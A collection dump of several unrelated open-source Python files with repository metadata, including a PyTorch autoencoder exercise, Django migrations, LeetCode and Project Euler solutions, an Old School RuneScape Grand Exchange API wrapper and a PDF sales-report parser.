layers = [[nn.Linear(num_hidden[i][0], num_hidden[i][1]), nn.BatchNorm1d(num_hidden[i][1]),
nn.ReLU()] for i in range(num_layers-1)]
layers = [layer for sublist in layers for layer in sublist]
# Append last layer whihc will be just Linear in this case
layers.append(nn.Linear(num_hidden[num_layers-1][0], num_hidden[num_layers-1][1]))
layers.append(nn.Sigmoid())
# Convert into model
model = nn.Sequential(*layers)
return model
def param_reg(self):
"""
Applies regularisation to model parameters
"""
reg = 0
# Loop over models and their parameters and compute regularisation constraints
for model in [self.encoder, self.decoder]:
for param in model.parameters():
target = Variable(torch.zeros(param.size()))
reg += self.weight_f(param, target)
# Multiply with regularisation strenght and return
return reg * self.lam
def encode(self, x):
"""
Encodes objects to hidden representations (E: R^inp_size -> R^hid_size)
:param x: inputs, Variable of shape (batch_size, inp_size)
:return: hidden represenation of the objects, Variable of shape (batch_size, hid_size)
"""
return self.encoder(x)
def decode(self, h):
"""
Decodes objects from hidden representations (D: R^hid_size -> R^inp_size)
:param h: hidden represenatations, Variable of shape (batch_size, hid_size)
:return: reconstructed objects, Variable of shape (batch_size, inp_size)
"""
return self.decoder(h)
def forward(self, x):
"""
Encodes inputs to hidden representations and decodes back.
x: inputs, Variable of shape (batch_size, inp_size)
return: reconstructed objects, Variable of shape (batch_size, inp_size)
"""
return self.decode(self.encode(x))
def loss_function(self, recon_x, x):
"""
Calculates the loss function.
:params recon_x: reconstructed object, Variable of shape (batch_size, inp_size)
:params x: original object, Variable of shape (batch_size, inp_size)
:return: loss
"""
loss = self.loss_f(recon_x, x)
reg_loss = self.param_reg()
return loss + reg_loss
def train(model, optimizer, train_loader, test_loader):
for epoch in range(10):
model.train()
train_loss, test_loss = 0, 0
for data, _ in train_loader:
data = Variable(data).view(-1, 784)
x_rec = model(data)
loss = model.loss_function(x_rec, data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
train_loss += loss.data[0]
print('=> Epoch: %s Average loss: %.3f' % (epoch, train_loss / len(train_loader.dataset)))
model.eval()
for data, _ in test_loader:
data = Variable(data, volatile=True).view(-1, 784)
x_rec = model(data)
test_loss += model.loss_function(x_rec, data).data[0]
test_loss /= len(test_loader.dataset)
print('=> Test set loss: %.3f' % test_loss)
n = min(data.size(0), 8)
comparison = torch.cat([data.view(-1, 1, 28, 28)[:n], x_rec.view(-1, 1, 28, 28)[:n]])
if not os.path.exists('./pics'): os.makedirs('./pics')
save_image(comparison.data.cpu(), 'pics/reconstruction_' + str(epoch) + '.png', nrow=n)
return model
def test_work():
print('Start test')
get_loader = lambda train: torch.utils.data.DataLoader(
datasets.MNIST('./data', train=train, download=True, transform=transforms.ToTensor()),
batch_size=50, shuffle=True)
train_loader, test_loader = get_loader(True), get_loader(False)
try:
model = AutoEncoder(inp_size=784, hid_size=20)
optimizer = optim.Adam(model.parameters(), lr=1e-3)
except Exception:
assert False, 'Error during model creation'
return
try:
model = train(model, optimizer, train_loader, test_loader)
except Exception:
assert False, 'Error during training'
return
test_x = Variable(torch.randn(1, 784))
rec_x, hid_x = model(test_x), model.encode(test_x)
submodules = dict(model.named_children())
layers_with_params = np.unique(['.'.join(n.split('.')[:-1]) for n, _ in model.named_parameters()])
assert (hid_x.dim() == 2) and (hid_x.size(1) == 20), 'Hidden representation size must be equal to 20'
assert (rec_x.dim() == 2) and (rec_x.size(1) == 784), 'Reconstruction size must be equal to 784'
assert len(layers_with_params) <= 6, 'The model must have no more than 6 layers '
assert np.all(np.concatenate([list(p.shape) for p in model.parameters()]) <= 800), 'All hidden sizes must be less than 800'
assert np.all([isinstance(submodules[name], nn.Linear) for name in layers_with_params]), 'All layers with parameters must be nn.Linear'
print('Success!🎉')
if __name__ == '__main__':
test_work()
|
[
"jevgenij.gamper5@gmail.com"
] |
jevgenij.gamper5@gmail.com
|
9793347779f69c826570acc355bb6cdf1294661c
|
ed0635218d236383fcf76a7c8ad341e49398c310
|
/django_film/films/migrations/0002_auto_20201024_1814.py
|
9dc5b742374ef37bbb1920ad4951bb4c5e931366
|
[] |
no_license
|
PixelGore/DjangoMovie
|
d470bea3c6859c05816e34daba027d35c84ac99e
|
8aedb37de959be1bc7d12db11c1efdf80b054525
|
refs/heads/master
| 2023-01-12T14:45:06.488388
| 2020-11-18T19:38:44
| 2020-11-18T19:38:44
| 289,012,907
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# Generated by Django 3.1 on 2020-10-24 15:14
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('films', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='film',
old_name='buget',
new_name='budget',
),
migrations.AlterField(
model_name='film',
name='world_premiere',
field=models.DateField(default=datetime.date.today),
),
]
|
[
"pixelgore312@gmail.com"
] |
pixelgore312@gmail.com
|
dc0d960ac8949374c88a435763cdfbd88be35774
|
372185cd159c37d436a2f2518d47b641c5ea6fa4
|
/面试题 01.06. 字符串压缩-2.py
|
762b147ca2bbe70cac56a5165cae8e41198f3003
|
[] |
no_license
|
lidongze6/leetcode-
|
12022d1a5ecdb669d57274f1db152882f3053839
|
6135067193dbafc89e46c8588702d367489733bf
|
refs/heads/master
| 2021-07-16T09:07:14.256430
| 2021-04-09T11:54:52
| 2021-04-09T11:54:52
| 245,404,304
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
class Solution:
def compressString(self, S: str) -> str:
        S += '-'  # append a sentinel '-' to the end of S to avoid special-casing the tail
cnt, n, encoded = 1, len(S), ""
for i in range(1, n):
if S[i] == S[i - 1]:
cnt += 1
else:
encoded += S[i - 1] + str(cnt)
cnt = 1
return S[:-1] if len(encoded) >= n - 1 else encoded
S="aabcccccaaa"
print(Solution().compressString(S))
|
[
"lidongze6@163.com"
] |
lidongze6@163.com
|
346c037b556e11558d727e9d60f768c6218ab88b
|
2b86301d5ad3fecaa5a300cabfe6b4dfc82b78ed
|
/venv/Lib/site-packages/cassiopeia/transformers/status.py
|
49c3c8f18ce979ce173b3259f82f4f330884db75
|
[
"MIT"
] |
permissive
|
sserrot/champion_relationships
|
72823bbe73e15973007e032470d7efdf72af3be0
|
91315d6b7f6e7e678d9f8083b4b3e63574e97d2b
|
refs/heads/master
| 2022-12-21T05:15:36.780768
| 2021-12-05T15:19:09
| 2021-12-05T15:19:09
| 71,414,425
| 1
| 2
|
MIT
| 2022-12-18T07:42:59
| 2016-10-20T01:35:56
|
Python
|
UTF-8
|
Python
| false
| false
| 871
|
py
|
from typing import Type, TypeVar
from datapipelines import DataTransformer, PipelineContext
from ..core.status import ShardStatusData, ShardStatus
from ..dto.status import ShardStatusDto
T = TypeVar("T")
F = TypeVar("F")
class StatusTransformer(DataTransformer):
@DataTransformer.dispatch
def transform(self, target_type: Type[T], value: F, context: PipelineContext = None) -> T:
pass
# Dto to Data
@transform.register(ShardStatusDto, ShardStatusData)
def shard_status_dto_to_data(self, value: ShardStatusDto, context: PipelineContext = None) -> ShardStatusData:
return ShardStatusData(**value)
# Data to Core
#@transform.register(ShardStatusData, ShardStatus)
def shard_status_data_to_core(self, value: ShardStatusData, context: PipelineContext = None) -> ShardStatus:
return ShardStatus.from_data(value)
|
[
"sserrot@users.noreply.github.com"
] |
sserrot@users.noreply.github.com
|
38603d24ebc7e0e81b6743d9967c7e4044bfa08a
|
6ffc48e8656320d064c554c663c2e9150fd57582
|
/code_blocks/functions.py
|
6b31609d7831734994eeb8767e411333e3de1ab3
|
[] |
no_license
|
cslisenka/learn-python
|
509aebe2efb07c8024c623ed78dde28966f54ed9
|
24eb94510e8559de1e4ef58d6238d989dbc0e797
|
refs/heads/main
| 2023-03-20T08:13:25.542930
| 2021-03-19T15:41:02
| 2021-03-19T15:41:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,484
|
py
|
# Function example
# first parameter is string, second is integer
def say_hi(name, age):
# All core of the function happens inside space
print("Say hi " + name + " age " + str(age))
# This statement is also inside function
print("Say hi again")
# Function doesn't return value
# Function that returns value
def cube(num):
print("Computing cube of " + str(num))
return num * num * num
# Function with multiple input parameters
def my_sum(num1, num2):
print("Computing sum of " + str(num1) + " and " + str(num2))
return num1 + num2
# Code which is not in tab - is outside of the function
print("Not in function")
say_hi("Ben", 30)
result = cube(5)
print(str(result))
sum_result = my_sum(1, 5)
print(str(sum_result))
# specify strict types
def greeting(name: str) -> str:
return "name " + name
print(greeting("greet"))
# var args
def var_args_fun(*args):
# args become a tuple
print(type(args))
print(args)
def var_kargs_fun(**kargs):
# kargs become a dictionary
print(type(kargs))
print(kargs)
# we can combine
def var_args_kargs_fun(*args, **kargs):
print(args)
print(kargs)
var_args_fun("aaa", "bbb", "ccc")
var_kargs_fun(aaa="aaa", bbb="bbb")
var_args_kargs_fun("aaa", "vvv", aaa="aaa", bbb="bbb")
# there could be aliases for existing types and we may pass function as method parameter as a callback
# https://docs.python.org/3/library/typing.html
# there could be generics as well
# TODO
|
[
"kanstantsin_slisenka@epam.com"
] |
kanstantsin_slisenka@epam.com
|
0394425acf0ab2d9024c5ea5110df0c57dcc779e
|
175f90e98b52a03fe87f79617eb0f4bd561182de
|
/grandexchange.py
|
154e455a607c0a4979bb0b1cc5eca335bcf8b2ad
|
[
"MIT"
] |
permissive
|
AdamKBeck/OSRS-API-Wrapper
|
c829ec20d0178d9d311717b0631ef058810ff9b8
|
d32253ced31170118c12e930ad1134eabbbe3359
|
refs/heads/master
| 2020-12-27T10:20:42.937766
| 2020-01-04T19:16:48
| 2020-01-04T19:16:48
| 237,867,522
| 0
| 0
|
MIT
| 2020-02-03T02:02:34
| 2020-02-03T02:02:34
| null |
UTF-8
|
Python
| false
| false
| 3,096
|
py
|
import const
import urllib.request
import json
import warnings
from item import Item
from pricetrend import PriceTrend
from priceinfo import PriceInfo
class GrandExchange(object):
    # OSBuddy is an unofficial API, but it is more accurate than the official API.
    # They give more significant figures than the official API and the values
# are closer to the actively traded prices.
@staticmethod
def _osbuddy_price(id):
# TODO: remove this. OSBuddy no longer has a public API?
warnings.warn(
"OSBuddy no longer provides a public API. This functionality will be removed.",
DeprecationWarning,
stacklevel=2,
)
osb_uri = const.OSBUDDY_PRICE_URI + str(id)
osb_price = None
try:
osb_response = urllib.request.urlopen(osb_uri)
osb_data = osb_response.read()
encoding = osb_response.info().get_content_charset("utf-8")
osb_response.close()
osb_json_data = json.loads(osb_data.decode(encoding))
osb_price = osb_json_data["overall"]
except Exception:
pass # oh well, price will just be less accurate
return osb_price
@staticmethod
def item(id, try_osbuddy=False):
uri = const.GE_BY_ID + str(id)
try:
response = urllib.request.urlopen(uri)
except urllib.error.HTTPError:
raise Exception("Unable to find item with id %d." % id)
data = response.read()
encoding = response.info().get_content_charset("utf-8")
response.close()
osb_price = None
if try_osbuddy:
osb_price = GrandExchange._osbuddy_price(id)
json_data = json.loads(data.decode(encoding))["item"]
name = json_data["name"]
description = json_data["description"]
is_mem = bool(json_data["members"])
type = json_data["type"]
type_icon = json_data["typeIcon"]
# price info/trends
current = json_data["current"]
today = json_data["today"]
day30 = json_data["day30"]
day90 = json_data["day90"]
day180 = json_data["day180"]
curr_trend = PriceTrend(current["price"], current["trend"], None)
trend_today = PriceTrend(today["price"], today["trend"], None)
trend_30 = PriceTrend(None, day30["trend"], day30["change"])
trend_90 = PriceTrend(None, day90["trend"], day90["change"])
trend_180 = PriceTrend(None, day180["trend"], day180["change"])
price_info = PriceInfo(
curr_trend, trend_today, trend_30, trend_90, trend_180, osb_price
)
return Item(id, name, description, is_mem, type, type_icon, price_info)
def main():
abyssal_whip_id = 4151
whip = GrandExchange.item(abyssal_whip_id)
print(whip.name, whip.description, whip.price(), sep="\n")
rune_axe_id = Item.get_ids("rune axe")
rune_axe = GrandExchange.item(rune_axe_id)
print(rune_axe.name, rune_axe.description, rune_axe.price(), sep="\n")
if __name__ == "__main__":
main()
|
[
"schelthoff.chase@gmail.com"
] |
schelthoff.chase@gmail.com
|
b1302dd60d3a32627cb6ad996f9211ce709fda77
|
39aee520641a16b297c14d3bd3a85f2f5d892617
|
/sub.py
|
22a52cd4676ce28b618e26afceb38216065af4c8
|
[] |
no_license
|
AlexJJGreen/dsm_pdf_stripper
|
ea90627cf57e646a2ad83d205fad20c676f6202f
|
de282807fc42fdb5994b0dc16588dcbb7fb7ca1f
|
refs/heads/main
| 2023-04-28T01:02:18.853246
| 2021-04-30T16:16:46
| 2021-04-30T16:16:46
| 352,024,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,427
|
py
|
import PyPDF2 as pp
import csv
import pandas as pd
import shutil
from ordered_set import OrderedSet
import xlsxwriter
from re import search
#### --- GLOBALS --- ####
doc = pp.PdfFileReader("Story Analysis WTD INTERNATIONAL.pdf")
total_pages = doc.getNumPages()
store_datasets = []
story_datasets = {}
# cat_datasets = {}
# week to date counter, on false ignore pages, append current story_dataset to store_dataset
wtd = True
# mutate str to float on numeric cols, nb. order of ops prevents refactor, don't touch!
def parse_to_numeric(filtered_text):
parsed_text = []
for i in filtered_text:
if "(" in i:
i = i.replace("(", "-")
if ")" in i:
i = i.replace(")", "")
if "%" in i:
i = i.replace("%", "")
if "," in i:
i = i.replace(",", "")
if i == "n/a" or i == "N/A":
i = 0
if (i != None) or (i != "Total"):
float(i)
parsed_text.append(i)
return parsed_text
for page in range(total_pages):
# get page extract text
current_page = doc.getPage(page).extractText()
# split into list
raw_text = current_page.splitlines()
# convert to python str
for i in range(len(raw_text)):
str(raw_text[i])
# check page type
if raw_text[0] == "STORY ANALYSIS YESTERDAY":
#print("triggered")
wtd = False
# print(story_datasets)
try:
story_datasets["STORY"] = list(OrderedSet(story_datasets["STORY"]))
for i in range(len(story_datasets["Unit Mix %"])):
if story_datasets["Item L3 Desc"][i] != "Total":
story_datasets["STORY"].insert(i, story_datasets["STORY"][i -1])
if story_datasets["Unit Mix %"][i] == "n/a%":
story_datasets["Units"].insert(i, 0)
if i != 0:
story_datasets["store"].insert(i, story_datasets["store"][i - 1])
# parse Sales £, Units, Cash Mix %, Unit Mix % to float
story_datasets["Sales £"] = parse_to_numeric(story_datasets["Sales £"])
story_datasets["Cash Mix %"] = parse_to_numeric(story_datasets["Cash Mix %"])
#print(story_datasets["Cash Mix %"])
for i in story_datasets["Cash Mix %"]:
if (i != None) or (i != "Total"):
i = float(i) / 100
story_datasets["Unit Mix %"] = parse_to_numeric(story_datasets["Unit Mix %"])
for i in story_datasets["Unit Mix %"]:
if (i != None) or (i != "Total"):
i = float(i) / 100
store_datasets.append(story_datasets)
#print(store_datasets)
except:
# print("passed")
pass
story_datasets = {}
elif raw_text[0] == "STORY ANALYSIS WEEK TO DATE":
# check page is not empty
if len(raw_text) >= 9:
# set bool trigger for WTD pages without title
wtd = True
# get meta
story_datasets["store"] = [raw_text[1]]
del raw_text[0:2]
# get dict keys --> {Store: "", STORY: [], Item L3 Desc: [], Sales £: [], Units: [], Cash Mix %: [], Unit Mix %: []}
for i in range(6):
story_datasets[raw_text[i]] = []
del raw_text[0:6]
# strip story names into one col and append to datasets, break point on list i == Total && i + 1 == Total
c = 0
for i in range(len(raw_text)):
if (raw_text[i] == "Total") and (raw_text[i + 1] == "Total"):
break
else:
story_datasets["STORY"].append(raw_text[i])
c += 1
del raw_text[0:c]
# cash and units mix cols ALWAYS contain %, identify and /2 to get col length, strip and append to dict
col_len = int(sum("%" in s for s in raw_text)/2)
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Unit Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Cash Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
# strip item desc append to Item L3 Desc
for i in range(0,col_len):
story_datasets["Item L3 Desc"].append(raw_text[i])
del raw_text[0:col_len]
# strip Sales £, append and del
for i in range(0,col_len):
story_datasets["Sales £"].append(raw_text[i])
del raw_text[0:col_len]
#append last list to Units
for i in range(len(raw_text)):
story_datasets["Units"].append(raw_text[i])
else:
pass
elif (raw_text[0] == "STORY") and (wtd is True):
# delete column titles
del raw_text[0:6]
# stories alway UPPPER, append to stories
story_appended_count = 0
for text in raw_text:
if text.isupper():
story_datasets["STORY"].append(text)
story_appended_count += 1
del raw_text[0:story_appended_count]
# cash and units mix cols ALWAYS contain %, identify and /2 to get col length, strip and append to dict
col_len = int(sum("%" in s for s in raw_text)/2)
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Unit Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Cash Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
# strip item desc append to Item L3 Desc
for i in range(0,col_len):
story_datasets["Item L3 Desc"].append(raw_text[i])
del raw_text[0:col_len]
# strip Sales £, append and del
for i in range(0,col_len):
story_datasets["Sales £"].append(raw_text[i])
del raw_text[0:col_len]
# append last list to Units
for i in range(len(raw_text)):
story_datasets["Units"].append(raw_text[i])
else:
pass
# datasets to df -> to excel
with pd.ExcelWriter('stor_analysis.xlsx') as writer:
for dataset in store_datasets:
sheetname = dataset["store"][0]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["store", "STORY", "Item L3 Desc"], inplace=True)
df.to_excel(writer, engine='xlsxwriter', sheet_name=sheetname)
# collate store, ks, inno to df
ks_data = []
inno_data = []
solus_data = []
for dataset in store_datasets:
if "Karstadt" in dataset["store"][0]:
dataset["Grouping"] = ["Karstadt" for x in range(len(dataset["store"]))]
del dataset["store"]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["Grouping", "STORY", "Item L3 Desc"], inplace=True)
ks_data.append(df)
elif "Inno" in dataset["store"][0]:
dataset["Grouping"] = ["Inno" for x in range(len(dataset["store"]))]
del dataset["store"]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["Grouping", "STORY", "Item L3 Desc"], inplace=True)
inno_data.append(df)
elif ("Inno" not in dataset["store"][0]) and ("Karstadt" not in dataset["store"][0]) and (dataset["store"][0] != "INTERNATIONAL"):
dataset["Grouping"] = ["Solus" for x in range(len(dataset["store"]))]
del dataset["store"]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["Grouping", "STORY", "Item L3 Desc"], inplace=True)
solus_data.append(df)
# print(ks_data)
collated_dfs = []
collated_dfs.append(ks_data)
collated_dfs.append(inno_data)
collated_dfs.append(solus_data)
for dfs in collated_dfs:
collated_df = pd.concat(dfs)
collated_df["Sales £"] = collated_df["Sales £"].apply(pd.to_numeric)
collated_df["Units"] = collated_df["Units"].apply(pd.to_numeric)
collated_df["Cash Mix %"] = collated_df["Sales £"].apply(pd.to_numeric)
collated_df["Unit Mix %"] = collated_df["Units"].apply(pd.to_numeric)
sheetname = collated_df.index.get_level_values(0)[0]
collated_df = collated_df.groupby(level=[1,2]).sum().reset_index()
collated_df.set_index(["STORY","Item L3 Desc"], inplace=True)
stories = list(collated_df.index.unique(level='STORY'))
collated_df_total = collated_df[collated_df.index.get_level_values("Item L3 Desc") == "Total"]
cash_total = collated_df["Sales £"].loc[("Total","Total")]
print(cash_total)
unit_total = collated_df["Units"].loc[("Total","Total")]
print(collated_df_total["Cash Mix %"])
collated_df_total["Cash Mix %"] = collated_df_total["Cash Mix %"].apply(lambda x: round(float(x / cash_total),3))
collated_df_total["Unit Mix %"] = collated_df_total["Unit Mix %"].apply(lambda x: round(float(x / unit_total),3))
collated_df_total.sort_values(by=["Cash Mix %"], inplace=True, ascending=False)
collated_df_total.to_excel(writer, engine='xlsxwriter', sheet_name=sheetname + "_stories")
totals = []
unit_totals = []
for story in stories:
totals.append(collated_df["Cash Mix %"].loc[(story,"Total")])
unit_totals.append(collated_df["Unit Mix %"].loc[(story,"Total")])
items = list(collated_df.index.unique(level='Item L3 Desc'))
for s,t in zip(stories,totals):
for item in items:
try:
collated_df["Cash Mix %"].loc[(s,item)] = round(float(collated_df["Cash Mix %"].loc[(s,item)] / t),3)
except:
pass
for s,ut in zip(stories,unit_totals):
for item in items:
try:
collated_df["Unit Mix %"].loc[(s,item)] = round(float(collated_df["Unit Mix %"].loc[(s,item)] / ut),3)
except:
pass
# collated_df.reindex(collated_df_total.index)
collated_df.to_excel(writer, engine='xlsxwriter', sheet_name=sheetname)
|
[
"alexjjgreen@gmail.com"
] |
alexjjgreen@gmail.com
|
e2333991b304b2918619d52caec66de11002b170
|
65157ac38f5b59f3871b086658c3bcac5490af36
|
/PE_Q35.py
|
95e2259118844b398202703b0f2359621e066a6b
|
[] |
no_license
|
geooff/ProjectEulerSolutions
|
590dba1e786ab6ca0f8c9aeda94c74f7603831a7
|
b94d44b074f1a0039973ec01760aafa584520ba4
|
refs/heads/master
| 2023-02-05T08:47:01.954976
| 2023-01-27T17:06:26
| 2023-01-27T17:06:26
| 124,963,886
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,290
|
py
|
"""
The number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719,
are themselves prime.
There are thirteen such primes below 100:
2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
How many circular primes are there below one million?
"""
def eratosthenes(n):
"""Yields the sequence of prime numbers via the Sieve of Eratosthenes."""
D = {} # map composite integers to primes witnessing their compositeness
q = 2 # first integer to test for primality
primes = []
while q <= n:
p = D.pop(q, None)
if p:
x = p + q
while x in D:
x += p
D[x] = p
else:
D[q * q] = q
primes.append(q)
q += 1
return primes
primes = eratosthenes(1000000)
i = 0
circular_primes = 0
while primes:
v = str(primes[i])
local_primes = []
for j in range(len(v)):
if (lookup := int(v[j:] + v[:j])) not in primes:
primes.pop(i)
break
local_primes.append(lookup)
if len(local_primes) == len(v):
local_primes = set(local_primes)
circular_primes += len(local_primes)
for k in local_primes:
primes.remove(k)
print(circular_primes)
|
[
"geoffbeamish@gmail.com"
] |
geoffbeamish@gmail.com
|
6d74b138ea984813b2a78415fafb8ca57a86d304
|
58dd69ad78a107255f1b057cc3a77d2f407f0586
|
/garden/migrations/0005_auto_20180611_1153.py
|
3583e4b22885bffe96be8ac0e91f9c7c08025107
|
[] |
no_license
|
BartoszLewosz/Maintenance_ticketing_system
|
4598b8002622af6f040fad4511e8824a2dd3a208
|
61544a12ba8409be34ee4ffecca343144de130d9
|
refs/heads/master
| 2022-04-01T14:59:36.379216
| 2022-03-07T16:17:53
| 2022-03-07T16:17:53
| 133,713,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 577
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-06-11 11:53
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('garden', '0004_auto_20180523_2038'),
]
operations = [
migrations.AlterField(
model_name='problem',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"bartosz.lewosz@gmail.com"
] |
bartosz.lewosz@gmail.com
|
5252de910fb7351af98dc307cd1b89c9a3b3d065
|
3afcbc632db73e87a8b1ce8e3a5223c5a5da1451
|
/source/bonfire/orchestrator_demo_backup/AyC/__init__.py
|
c24dd585df60997da5840312cc73bce2647253e1
|
[] |
no_license
|
ruben11291/master-thesis
|
cc32ff790dd6f5dd8dcc9305460419ca2ece0e54
|
1668bfa96bafdf5ab7ffffcf8e1b9dbf041772d7
|
refs/heads/master
| 2020-06-03T20:55:35.957604
| 2014-10-09T13:58:34
| 2014-10-09T13:58:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24
|
py
|
from geoserver import *
|
[
"deimos@deimos-virtual-machine.(none)"
] |
deimos@deimos-virtual-machine.(none)
|